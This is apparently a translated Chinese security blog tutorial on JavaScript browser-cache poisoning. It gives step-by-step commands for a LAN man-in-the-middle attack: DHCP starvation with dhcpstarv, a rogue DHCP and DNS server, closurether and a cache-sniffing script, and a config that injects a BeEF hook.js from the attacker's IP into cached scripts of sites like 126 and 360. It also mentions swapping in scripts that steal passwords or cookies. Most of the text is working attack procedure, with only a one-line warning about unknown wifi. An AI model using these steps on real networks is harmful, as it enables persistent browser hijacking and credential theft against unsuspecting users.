Javascript Cache Poisoning learning and practice

Javascript Cache Poisoning learning and practice

0x00 cause

Not long ago, I bought a wooyun wifi and talked about Cache Poisoning:

Then we can see the description of wooyun wifi:

By default, this function comes with the cache poisoning function. By caching all pages in the view until January 1, 2099, you can clear all the cache and browser data to clear the impact of the cache poisoning.

I think this is a very good technique. Therefore, after reading the article written by @ EtherDream, Gu Ye and Du Niang, I have read this article, which is also a summary.

0x01 overview & principles

Javascript cache poisoning. To put it bluntly, the victim's browser caches a tampered js script. If the cache is not cleared, this victim loads our js script every time he accesses the webpage.

So what is his principle? It is very simple. In fact, it is the browser cache mechanism. Generally, in order to accelerate access to various static resources, major websites will cache some static resources to the client, in this way, the customer experience can be improved, and the stress on web servers can be reduced.

Browser cache control mechanisms include HTML Meta tags and HTTP header information. Generally, web developers can

Add to Node Tags, such:

#!html

The function of the code is to tell the browser that the current page is not cached, and each access needs to be pulled from the server. I will not talk about more browser caching mechanisms. For details, stamp me.

To pre-load and cache a script, you only need new Image (). src = ''. Of course, a few browsers do not support it, but both ie and chrome support it. Although the js file is not an image, it will still be cached.

0x02 preparations

Install node

Wget https://codeload.github.com/nodejs/node/zip/master-O node-master.zip // download tar zxvf node-master.zip // unzip cd node-master./configuremake // compile make install // install

Install closurether

npm install -g closurether

Install phantomjs

Download and install the SDK. For more information, see phantomjs. Select your system.

0x03 example

During the test, the demo of EtherDream was used. The specific process is as follows.

Download and install:

root@kali:~/Desktop/# git clone https://github.com/EtherDream/mitm-http-cache-poisoning.git jsroot@kali:~/Desktop/# cd jsroot@kali:~/Desktop/js/# npm install

Update cache list

root@kali:~/Desktop/js# cd tool/root@kali:~/Desktop/js/tool# phantomjs sniffer.js -i url.txt -o target.json

This script is mainly used to find out the longest cached script resources on various websites, that is, the link to the script to be infected. You can add the website in url.txt and copy the generated json to the asset directory.

root@kali:~/Desktop/js/tool# cp -fr target.json ../asset/

Run

root@kali:~/Desktop/js/tool# cd ..root@kali:~/Desktop/js# node index.js 

Test:

Browser proxy HTTP-> 127.0.0.1: 8080 access any HTTP.

Close the proxy and open websites such as 126,360 (chrome testing succeeds, Firefox fails.

Close the browser (do not clear the cache) and open it again. When you access 360, a dialog box is displayed.

Specifically, index. js implements proxy and replaces the original static script response content, and changes the Cache-Control field in the response header to max-age = 31536000, as shown in the Code:

The replaced script is stub. js under the asset directory, and stub. js injects external JavaScript key code such:

Here, www.etherdream.com/hack/trojan.js is our controllable js. In the previous example, the content of this js is

alert('xss run: ' + location.href);

We can implement different functions by modifying the script content.

0x04 practice

In this practice, dhcpstarv, isc-dhcp-server, beef, and closurether are used in the LAN. The attacker uses kali2.0.

1. Enable beef

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# ./beef

2. Configure closurether

Obtain the latest cache list

root@kali:~# cd /usr/local/lib/node_modules/closurether/tool/cache-snifferroot@kali:/usr/local/lib/node_modules/closurether/tool/cache-sniffer#  phantomjs sniffer.js

You can specify the website by modifying the url. The url contains 126 and 360 websites during this test. Configure the config. json file as follows:

{        "hacker_url": "http://192.168.1.108:3000/hook.js",        "inject_url": "http://10086.cn/js10086/201306301200.js",        "debug": false,        "dump": false,        "dumpPath": "./dump/"}

Here, hacker_url is our js address, which is the js address of beef, and inject_url is the disguised js address.

Run closurether:

root@kali:~# closurether[SYS] local ip: 192.168.1.108[DNS] running 0.0.0.0:53[WEB] listening :::80[WEB] listening :::443

2. dhcp attacks:

Download dhcpstarv and install:

root@kali:~/Desktop# tar zxvf dhcpstarv-0.2.1.tar.gzroot@kali:~/Desktop# cd dhcpstarv-0.2.1/root@kali:~/Desktop/dhcpstarv-0.2.1# ./configureroot@kali:~/Desktop/dhcpstarv-0.2.1# make root@kali:~/Desktop/dhcpstarv-0.2.1# make install

By default, dhcpstarv is not installed in Kali. You can also use yersinia instead.

Install the dhcp server:

root@kali:~# apt-get install isc-dhcp-server

Modify dhcp configuration file dhcpd. conf

root@kali:~# cd /etc/dhcp/root@kali:/etc/dhcp# cp dhcpd.conf dhcpd.conf.bakroot@kali:/etc/dhcp# vim dhcpd.conf

Modify the address pool allocated by DHCP, set the default route to the Ip address of the original route, and modify the broadcast address:

Set dns to the address with closurether enabled, for example:

It is best to add a normal DNS server address as the most alternative to prevent our DNS service from not parsing some domain names.

Enable route forwarding for the operating system:

root@kali:~# echo "1" > /proc/sys/net/ipv4/ip_forward

Start the DHCP service:

root@kali:/etc/dhcp# service isc-dhcp-server start

Attack normal dhcp servers and consume ip resources:

root@kali:~# dhcpstarv -i eth0 -e 192.168.1.108

-E parameter followed by the attacker's ip address

Then, when a client is connected, the new Intranet host will use the IP address allocated by the attacker's DHCP server because the normal DHCP server has no available IP resources. For example:

We can see that DNS has changed to the address we want to change.

Here, if you can directly change the DNS in the route, you can directly change the route. This is relatively stable. Change the DNS to the address where we run closurether.

Main tool run:

At this time, when the DNS Client is tampered with to browse the website, it will run our embedded JS script. After opening 126, we can see that beef has been successfully launched:

While our js has been hidden as js 10086

Restart the vro, use normal DHCP to assign IP addresses to the virtual machine, and use the browser (Cache not cleared) to open 360:

At this time, we can see that beef is going online again:

Beef has powerful functions, but it is not the focus of this Article. Of course, js can also be replaced with other functions, such as stealing js of the account and password of some websites, or obtaining client cookies, I will not talk about it here.

In this way, the time machine effect is achieved. Although the Internet environment has changed, but the browser cache is not cleared, we will execute our js, and the entire attack has been completed.

0x05 Summary

From the above process, we can draw a conclusion that you should not freely access the Internet through wifi that you don't know!